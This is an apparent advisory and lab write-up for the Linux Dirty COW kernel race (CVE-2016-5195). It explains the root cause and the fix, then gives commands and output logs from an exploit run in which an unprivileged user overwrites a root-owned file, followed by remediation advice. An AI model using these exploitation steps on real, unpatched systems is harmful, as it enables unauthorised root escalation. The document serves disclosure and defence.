CVE-2016-5195 — Dirty COW: Unprivileged Write to Read-Only Root-Owned Files

Published 2026-06-04

Verified exploitation

An unprivileged local user can overwrite any read-only memory-mapped file (including /etc/passwd and SUID binaries) on any Linux kernel from 2.6.22 through 4.8.2, achieving full root privilege escalation.

Field               Value
Project             Linux kernel
Affected component  torvalds/linux, memory management (mm/gup.c)
Severity            HIGH
CVSS                7.8 (CVSS v3.1)
CWE                 CWE-362 (Race Condition)
Affected versions   2.6.22 (2007) through 4.8.2
Fixed version       4.8.3 (October 2016); stable backports in 3.2.83, 3.4.113, 3.10.104, 3.12.66, 3.16.38, 3.18.44, 4.1.35, 4.4.26, 4.7.9
Impact              Local privilege escalation to root

1. Vulnerability Overview

The Linux kernel's memory management subsystem contains a race condition in the get_user_pages (GUP) path, the code in mm/gup.c that resolves user-space virtual addresses to physical page frames. An unprivileged local user can exploit this race to write arbitrary bytes into the page cache of any file they can open for reading and map privately, even though they hold no write permission on it. Any such file (configuration files, SUID executables, kernel modules) can be silently overwritten. The vulnerability became publicly known as "Dirty COW" in October 2016 and was immediately exploited in the wild; it is listed in CISA's Known Exploited Vulnerabilities catalog and tracked under GHSA-j68w-7qm9-fjqq (CVSS 7.8).

Root cause

File: mm/gup.c, functions follow_page_pte and the fault-retry loop (faultin_page / __get_user_pages).

The kernel handles a write to a private, copy-on-write (COW) mapping in two fault steps. On the first fault with FOLL_WRITE set, faultin_page calls do_cow_fault, which allocates a new page and marks it dirty but leaves the PTE read-only. On the second fault, do_wp_page detects that COW has already occurred and returns VM_FAULT_WRITE. At that point the vulnerable kernel strips the write requirement unconditionally:

/* Before (vulnerable): */
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
    *flags &= ~FOLL_WRITE;   // drops write requirement — race window opens

After this flag-clear, the GUP loop retries and passes through cond_resched(). If a concurrent thread calls madvise(MADV_DONTNEED) on the mapped region in that scheduling gap, the kernel discards the COW'd page and clears its PTE. Because FOLL_WRITE is no longer set, the third fault is handled as a read fault and maps the original page-cache page instead of a fresh private copy. The subsequent write through /proc/self/mem then lands directly in the page cache, bypassing copy-on-write entirely, and the modified page can reach the on-disk file even though the user has no write permission.

The fix introduces a new flag FOLL_COW (0x4000) and replaces flag-stripping with flag-addition:

/* After (fixed): */
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
    *flags |= FOLL_COW;      // marks that COW has happened, keeps write intent

A new helper, can_follow_write_pte, then allows a write-intent lookup to follow a PTE that is not writable only when FOLL_FORCE and FOLL_COW are both set and the PTE is dirty, that is, only when the PTE maps the private copy produced by the COW fault:

static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
    return pte_write(pte) ||
        ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}

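The guard in follow_page_pte is updated from !pte_write(pte) to !can_follow_write_pte(pte, flags). Once madvise(MADV_DONTNEED) has dropped the COW'd copy and a clean page-cache page is mapped in its place, pte_dirty returns false and the follow is rejected. Write intent is still set, so the retry takes a new COW fault instead of reaching the page cache, which closes this race window.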
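The before/after behaviour can be illustrated with a small user-space model. This is a sketch in bash, not kernel code. can_follow_write_pte mirrors the helper shown above, and FOLL_COW uses the value given in the text. FOLL_WRITE (0x01) and FOLL_FORCE (0x10) are assumed from mainline headers of that era. The simulate_retry function and its cow-copy, page-cache and retry-fault labels are hypothetical names introduced for illustration. The model covers only the retry that follows the VM_FAULT_WRITE return.

```bash
#!/usr/bin/env bash
# User-space model of the GUP write check; illustrative only, not kernel code.
FOLL_WRITE=$((0x01))   # assumed value (mainline header of that era)
FOLL_FORCE=$((0x10))   # assumed value (mainline header of that era)
FOLL_COW=$((0x4000))   # value quoted in the text

# can_follow_write_pte PTE_WRITE PTE_DIRTY FLAGS -> exit status 0 if allowed
can_follow_write_pte() {
  local pte_write=$1 pte_dirty=$2 flags=$3
  (( pte_write )) && return 0
  (( (flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty ))
}

# simulate_retry KERNEL RACED
#   KERNEL: "vulnerable" or "fixed"; RACED: 1 if madvise(MADV_DONTNEED) won.
# Prints where the forced write would land (hypothetical labels).
simulate_retry() {
  local kernel=$1 raced=$2
  local flags=$(( FOLL_WRITE | FOLL_FORCE ))
  local pte_write=0 pte_dirty=1          # COW copy: read-only PTE, dirty

  if [[ $kernel == vulnerable ]]; then
    flags=$(( flags & ~FOLL_WRITE ))     # old behaviour: drop write intent
  else
    flags=$(( flags | FOLL_COW ))        # fixed behaviour: remember the COW
  fi

  # If the race was lost to madvise, the COW copy is gone and the next
  # lookup can only find a clean page-cache page.
  if (( raced )); then pte_dirty=0; fi

  if (( (flags & FOLL_WRITE) == 0 )); then
    # No write check is applied at all.
    if (( raced )); then echo page-cache; else echo cow-copy; fi
  elif can_follow_write_pte "$pte_write" "$pte_dirty" "$flags"; then
    echo cow-copy
  else
    echo retry-fault                     # fault again with write intent
  fi
}

for kernel in vulnerable fixed; do
  for raced in 0 1; do
    echo "$kernel raced=$raced -> $(simulate_retry "$kernel" "$raced")"
  done
done
```

In this model the only case that reaches the page cache is the vulnerable kernel with the race won. The fixed kernel reports retry-fault for the same interleaving.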

2. Vulnerable Environment

The environment is a single AWS EC2 instance deliberately booted on the unpatched kernel 4.4.0-21-generic (package version 4.4.0-21.37). A container-based approach cannot reproduce this bug because containers share the host's kernel; a real VM with an old kernel is required.

Stack details:

  • Instance type: c4.xlarge — Xen HVM, non-Nitro, 4 vCPUs across 2 physical cores. The two physical cores are essential: the race requires two threads to run simultaneously on separate cores. A c4.large (1 physical core, 2 SMT siblings) was tested first and the race never fired in 5 attempts; the c4.xlarge with 2 physical cores (thread_siblings_list groups 0,2 and 1,3) wins the race on the first attempt.
  • Base AMI: Canonical Ubuntu 16.04 xenial (ami-03df7ce447aba3556, ap-southeast-1).
  • Kernel installation: the exact 4.4.0-21-generic package is fetched directly from archive.ubuntu.com by .deb URL and installed with dpkg -i to avoid the package manager resolving a patched version. GRUB is pinned to the vulnerable kernel via the explicit submenu entry Advanced options for Ubuntu>Ubuntu, with Linux 4.4.0-21-generic.
  • Runtime-patching disabled: Canonical Livepatch is not installed; Ubuntu Pro is not attached.
  • ptrace_scope: set to 0 persistently via /etc/sysctl.d/10-cve-ptrace.conf, so that Yama ptrace restrictions cannot interfere with the PoC.
  • Target file: /opt/cve/target — owned root:root, mode 0404 (world-readable, not writable by anyone other than root). A fresh random marker is written into it on every boot by cve-baseline.service, so any observed change reflects a real write through the race rather than a pre-seeded value.
  • Unprivileged actor: lowpriv (uid 1001, gid 1001, no sudo, password locked).
  • IaC: OpenTofu on AWS (ap-southeast-1, profile cve-lab). Cost: approximately $0.234/hr (c4.xlarge on-demand + 20 GB gp2 volume).
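The physical-core requirement described in the instance-type bullet can be checked on the host before running anything. The sketch below counts distinct SMT sibling groups from the standard sysfs topology files. The function name count_physical_cores and its optional root-directory argument are hypothetical, added only so the logic can be exercised against a fake directory tree.

```bash
#!/usr/bin/env bash
# Count distinct physical cores by de-duplicating SMT sibling groups.
# The optional argument (a sysfs-like root) is a hypothetical testing hook.
count_physical_cores() {
  local root=${1:-/sys/devices/system/cpu}
  cat "$root"/cpu[0-9]*/topology/thread_siblings_list 2>/dev/null \
    | sort -u | wc -l | tr -d ' '
}

cores=$(count_physical_cores)
if [ "$cores" -ge 2 ]; then
  echo "physical cores: $cores (two racing threads can run in parallel)"
else
  echo "physical cores: $cores (racing threads would share a core)"
fi
```

On the c4.xlarge described above, the sibling groups 0,2 and 1,3 would collapse to a count of 2.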

The IaC and support files are available for download: env.zip.

Confirming the environment is the vulnerable one. After provisioning, this smoke test verifies the kernel, parallelism, and target state:

cd env/tofu
export AWS_PROFILE=cve-lab
IP=$(tofu output -raw public_ip); KEY=$(tofu output -raw ssh_private_key_path)
ssh -o StrictHostKeyChecking=accept-new -i "$KEY" ubuntu@"$IP" '
  echo "== ready sentinel =="; sudo cat /opt/cve/READY 2>/dev/null || { echo NOT-READY; sudo cat /opt/cve/SUBSTRATE_FAILED 2>/dev/null; exit 1; }
  echo "== kernel ==";  uname -r
  echo "== vcpus ==";   nproc
  echo "== target ==";  stat -c "%n %U:%G %a" /opt/cve/target
  echo "== control =="; stat -c "%n %U:%G %a" /opt/cve/control-probe
  echo "== baseline exists (root channel, no value printed) =="; sudo test -s /opt/cve/target && echo BASELINE-PRESENT
  echo "== probe compiled =="; test -x /opt/cve/cowprobe && echo PROBE-READY
  echo "== ptrace_scope =="; cat /proc/sys/kernel/yama/ptrace_scope
  echo "== actor =="; id lowpriv
'

Expected: READY printed, uname -r = 4.4.0-21-generic, nproc = 4, target and control root:root 404, BASELINE-PRESENT, PROBE-READY, ptrace_scope = 0, lowpriv uid 1001.

3. How to Exploit

The exploit races two threads: one calls madvise(MADV_DONTNEED) in a tight loop on a private read-only mapping of the target file; the other opens /proc/self/mem and writes the attacker payload to the mapped address. When the scheduler interleaves them at exactly the right point, the kernel is tricked into writing to the shared page-cache page rather than the private COW copy.

The exploit script and PoC C source are available for download: exploit.zip.

Step 1 — Verify actor identity and lack of write permission

Before running the exploit, confirm that lowpriv genuinely cannot write the target:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  -t "sudo -n -u lowpriv bash -lc 'head -c 16 /opt/cve/target; echo; (echo X > /opt/cve/target) 2>&1; gcc --version | head -1'"

Expected output: the first 16 bytes of the target are printed, then Permission denied (proving lowpriv cannot write it), then a gcc version line.

Step 2 — Read the baseline (privileged channel)

Read the target's current content through the root channel before the exploit runs, so any post-exploit change is attributable to the race:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  'sudo head -c 25 /opt/cve/target; echo'

Step 3 — Run the exploit

The entrypoint copies exploit/dirtyc0w.c to the host as lowpriv, compiles it with gcc -O2 -pthread, and runs rounds of the race until the payload lands or the attempt budget is exhausted:

bash exploit/run.sh ./env/tofu/lab_ssh_key.pem 13.212.231.145 /opt/cve/target DIRTYCOW-PWNED-BY-LOWPRIV 110 8

Argument summary: SSH key, host IP, target path, attacker payload string, per-round time budget (seconds), maximum number of rounds.

The PoC performs these steps on the host as lowpriv:

  1. Copies exploit/dirtyc0w.c to /home/lowpriv/dirtyc0w.c.
  2. Compiles: gcc -O2 -pthread dirtyc0w.c -o dirtyc0w.
  3. In each round: runs ./dirtyc0w /opt/cve/target DIRTYCOW-PWNED-BY-LOWPRIV <budget>, which races madvise(MADV_DONTNEED) against /proc/self/mem writes, self-polls the file, and exits 0 when the bytes flip.
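The round structure (retry until the command exits 0 or the attempt budget runs out) can be sketched as a small wrapper. This is not the contents of exploit/run.sh, which is not reproduced here. The run_rounds function and its message strings are hypothetical, and the sketch only shows the control flow around an arbitrary command.

```bash
#!/usr/bin/env bash
# run_rounds MAX CMD [ARGS...]
# Hypothetical retry wrapper: runs CMD up to MAX times and stops at the
# first exit status 0. It does not reproduce the author's run.sh.
run_rounds() {
  local max=$1; shift
  local i
  for (( i = 1; i <= max; i++ )); do
    echo "round $i/$max"
    if "$@"; then
      echo "succeeded on round $i"
      return 0
    fi
  done
  echo "budget exhausted after $max rounds"
  return 1
}

# Example shape only (arguments taken from the steps above):
#   run_rounds 8 ./dirtyc0w /opt/cve/target DIRTYCOW-PWNED-BY-LOWPRIV 110
```

Because the per-round time budget is passed to the PoC itself, the wrapper only needs to count rounds and propagate the exit status.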

Step 4 — Confirm the exploit succeeded (independent privileged re-read)

The definitive proof of success is an independent root-level re-read of the on-disk file, not the exploit's own output:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  'sudo head -c 25 /opt/cve/target; echo'

What the evidence showed in this run

The exploit won on round 1 out of a maximum of 8. The exploit's stdout read:

[orchestrator] target=/opt/cve/target payload='DIRTYCOW-PWNED-BY-LOWPRIV' per=110s rounds=8
BUILD_OK
[orchestrator] === round 1/8 ===
[*] target=/opt/cve/target size=67 payload_len=25 budget=110s threads=4m/4w
[*] mmap 0x7f98054a8000
[+] COW-WON: target first bytes overwritten with payload
[orchestrator] COW race SUCCEEDED on round 1
unpriv-read:DIRTYCOW-PWNED-BY-LOWPRIV
run.sh exit: 0

The independent root-level re-read then confirmed:

$ sudo head -c 25 /opt/cve/target  =>  DIRTYCOW-PWNED-BY-LOWPRIV
post-sha256 = b62f3a039106642fb346f47100abf0c290a507c57062d0d4692addeb47b7e1d7
od -c (full 67 bytes):
  D I R T Y C O W - P W N E D - B Y - L O W P R I V e 1 e 3 5 4 b ...   (baseline tail intact)
perms after = -r-----r-- 1 root root 67  (0404, unchanged — no legitimate write path used)

The file permissions remained 0404 throughout; the exploit never obtained write permission. The first 25 bytes changed from the fresh per-boot baseline (DIRTYCOW-BASELINE-edf42c1, SHA-256 e5e4dc5d...) to the attacker payload (DIRTYCOW-PWNED-BY-LOWPRIV, SHA-256 b62f3a03...), while the random baseline tail bytes remained intact. That pattern is the expected signature of the COW page-cache overwrite path.
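The same three observations (unchanged size, payload as prefix, untouched tail) can be checked mechanically. The sketch below assumes two copies of the target taken through the privileged channel, one before and one after the run. The function name check_overwrite_signature and its result strings are hypothetical, and it assumes an ASCII payload so that character count equals byte count.

```bash
#!/usr/bin/env bash
# check_overwrite_signature BEFORE AFTER PAYLOAD
# Hypothetical helper: BEFORE and AFTER are privileged copies of the target
# taken before and after the run. Assumes an ASCII payload (1 char = 1 byte).
check_overwrite_signature() {
  local before=$1 after=$2 payload=$3
  local n=${#payload}

  # The overwrite must not change the file size.
  if [ "$(( $(wc -c < "$before") ))" -ne "$(( $(wc -c < "$after") ))" ]; then
    echo size-changed; return 1
  fi
  # The first n bytes must now equal the payload.
  if [ "$(head -c "$n" "$after")" != "$payload" ]; then
    echo prefix-mismatch; return 1
  fi
  # Everything after the first n bytes must be byte-identical.
  if ! cmp -s <(tail -c +"$((n + 1))" "$before") \
              <(tail -c +"$((n + 1))" "$after"); then
    echo tail-changed; return 1
  fi
  echo signature-ok
}
```

A prefix-only change with an identical tail and size is what distinguishes an in-place page-cache overwrite from the file being replaced or rewritten through a normal write path.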

To attribute the exploit result to the vulnerability, an independent reference probe (cowprobe, a separate Dirty COW racer compiled at boot) was run as lowpriv against a distinct control file /opt/cve/control-probe. It confirmed the Dirty COW code path is active on this host:

control-probe before = DIRTYCOW-CONTR...        (fresh un-won baseline after reboot)
$ sudo -n -u lowpriv /opt/cve/cowprobe /opt/cve/control-probe COWCONTROL-WON
POSITIVE-CONTROL-WON   (exit 0)
control-probe after (independent privileged re-read) = COWCONTROL-WON

The independent probe winning on a separate file confirms that the unpatched mm/gup.c TOCTOU code path is active on this host, so the candidate exploit's success cannot be attributed to unrelated causes.

Teardown

When finished, destroy the EC2 instance and all associated AWS resources:

cd env/tofu
export AWS_PROFILE=cve-lab
tofu destroy -auto-approve
rm -f ./lab_ssh_key.pem   # if any local remnant remains (path is relative to env/tofu after the cd above)

This terminates the instance, removes the security group, and deletes the ephemeral key pair.

4. Security Advice

Remediation

Upgrade to Linux kernel 4.8.3 or to one of the stable-branch releases that include the FOLL_COW fix: 3.2.83, 3.4.113, 3.10.104, 3.12.66, 3.16.38, 3.18.44, 4.1.35, 4.4.26, 4.7.9. All major distributions (Debian, Ubuntu, RHEL/CentOS, SUSE, Fedora) issued security updates in October and November 2016. The authoritative patch is commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 in torvalds/linux.

Apply your distribution's kernel security update through its normal package manager:

# Debian / Ubuntu
sudo apt-get update && sudo apt-get install --only-upgrade linux-image-generic

# RHEL / CentOS
sudo yum update kernel

Reboot after the update to load the patched kernel.
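After the reboot, the running kernel can be compared against a fixed release. The sketch below is a coarse check only, with a hypothetical helper name (version_lt). It relies on sort -V from GNU coreutils and compares against the mainline fix, 4.8.3. Stable branches have their own fixed releases, and distribution kernels backport fixes without changing the upstream version number, so a result that sorts before 4.8.3 means "check the branch release or the distribution advisory", not "vulnerable".

```bash
#!/usr/bin/env bash
# version_lt A B: succeeds when version A sorts strictly before version B.
# Relies on `sort -V` (version sort, available in GNU coreutils).
version_lt() {
  [ "$1" != "$2" ] &&
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Strip any distribution suffix such as "-21-generic" before comparing.
running=$(uname -r | cut -d- -f1)
if version_lt "$running" 4.8.3; then
  echo "$running sorts before 4.8.3: check the branch's fixed release or the distribution advisory"
else
  echo "$running is 4.8.3 or later"
fi
```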

Mitigations and workarounds

Where an immediate kernel upgrade is not possible:

  • Restrict /proc/self/mem writes. Some distributions and kernel configurations already restrict this path. Raising kernel.yama.ptrace_scope (/proc/sys/kernel/yama/ptrace_scope) limits ptrace and so can hinder the ptrace-based variant, although a value of 1 still lets a process trace its own descendants. It does not restrict a process's writes to its own /proc/self/mem, so it is not a substitute for the patch.
  • Grsecurity / PaX kernels harden the GUP path and block this class of exploit if already deployed.
  • SELinux and AppArmor policies can constrain processes from opening /proc/self/mem in write mode, limiting exploitability for confined applications; they do not protect unconfined users.
  • Runtime patching services (Canonical Livepatch, Red Hat kpatch, SUSE kGraft) were updated to cover CVE-2016-5195 shortly after disclosure. These allow applying the fix without a reboot on supported subscriptions.
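To see which Yama level a host is currently running, a sketch like the following maps the sysctl value to its meaning. The function name describe_ptrace_scope is hypothetical, and the one-line summaries paraphrase the kernel's Yama documentation rather than quote it.

```bash
#!/usr/bin/env bash
# describe_ptrace_scope VALUE
# Hypothetical helper; summaries paraphrase the kernel's Yama documentation.
describe_ptrace_scope() {
  case "$1" in
    0) echo "classic: a process may attach to others running under the same uid" ;;
    1) echo "restricted: attach only to descendants or declared tracers" ;;
    2) echo "admin-only: ptrace requires CAP_SYS_PTRACE" ;;
    3) echo "no-attach: ptrace attach is disabled" ;;
    *) echo "unknown" ;;
  esac
}

f=/proc/sys/kernel/yama/ptrace_scope
if [ -r "$f" ]; then
  describe_ptrace_scope "$(cat "$f")"
else
  echo "Yama ptrace_scope is not available on this system"
fi
```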

References